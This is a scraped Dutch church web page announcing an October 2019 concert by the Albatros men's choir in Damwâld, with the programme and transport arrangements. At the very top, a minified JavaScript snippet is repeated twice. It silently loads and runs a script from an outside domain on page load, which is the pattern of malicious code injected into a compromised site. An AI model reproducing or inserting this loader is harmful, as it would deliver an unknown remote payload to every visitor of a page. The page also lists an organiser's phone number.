;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zingend naar de zondag ... met het Groninger Chr. Mannenkoor Albatros - PKN Damwâld

Zingend naar de zondag … met het Groninger Chr. Mannenkoor Albatros

Gepubliceerd op: maandag 7 oktober 2019

Op zaterdagavond 26 oktober organiseren wij wederom Zingend naar de zondag in de Gereformeerde Kerk de Ontmoeting aan de Foarwei 48 in Damwald. Deze keer hebben we het bekende Groninger Chr. Mannenkoor Albatros uitgenodigd om u te laten genieten van hoogstaande zangkunst in zowel de Nederlandse als de Russische taal. Albatros, voortgekomen uit de gelijknamige sigarenfabriek in Nieuwe Pekela, werd opgericht in 1932. In de fabriek werkte veel personeel met een Christelijke achtergrond en onder het werk zongen veel mannen, vaak sigarenmakers, psalmen en andere christelijke liederen. Dit leidde tot de oprichting van het koor. De initiatiefnemers hebben niet kunnen bedenken waartoe het fabriekskoor van toen zou uitgroeien: een mannenkoor met zangers uit de wijde regio en dat inmiddels tot de nationale top mag worden gerekend door kwaliteit, klasse, stijl en repertoire. Het koor staat onder leiding van dirigent Cas Straatman en de begeleiding op het orgel is deze avond in handen van Bouko Tiggelaar. Het belooft weer een prachtige avond te worden waarin het koor reguliere en bekende liederen zal zingen maar ook diverse Russische liturgische liederen, zoals Bozje Nash, Amien en Mnogaja ljeta. You raise me Up, Hallelujah (Cohen) en King All Glorious staan ook op het programma.
Het belooft weer een geweldige avond te worden met dit ruim 60 leden tellende koor uit onze buur provincie Groningen. Uiteraard is er ook weer veel samenzang van bekende liederen uit o.a. Johannes de Heer.
Kortom een avond die u niet mag missen en waarvoor wij u wederom van harte uitnodigen om die bij te wonen. De presentatie is in handen van Ds. Gera den Dikken uit Drachten.
De avond begint om 19.30 uur met halverwege een koffie/thee pauze met aan het eind een collecte voor de bestrijding van de onkosten.

VERVOER Damwâld ! Wilt u graag aanwezig zijn maar kunt u er niet komen, dan haalt de organisatie u graag op en brengt u weer thuis. U kunt hiervoor contact opnemen met Koop Schaafsma via 0613765741 of email: klik hier.

Woont u in Nij Tjaerda, dan ontvangt u weer een briefje in de bus om u voor vervoer op te geven, in te leveren bij het winkeltje. U krijgt ook een gereserveerde plek vooraan in de kerk.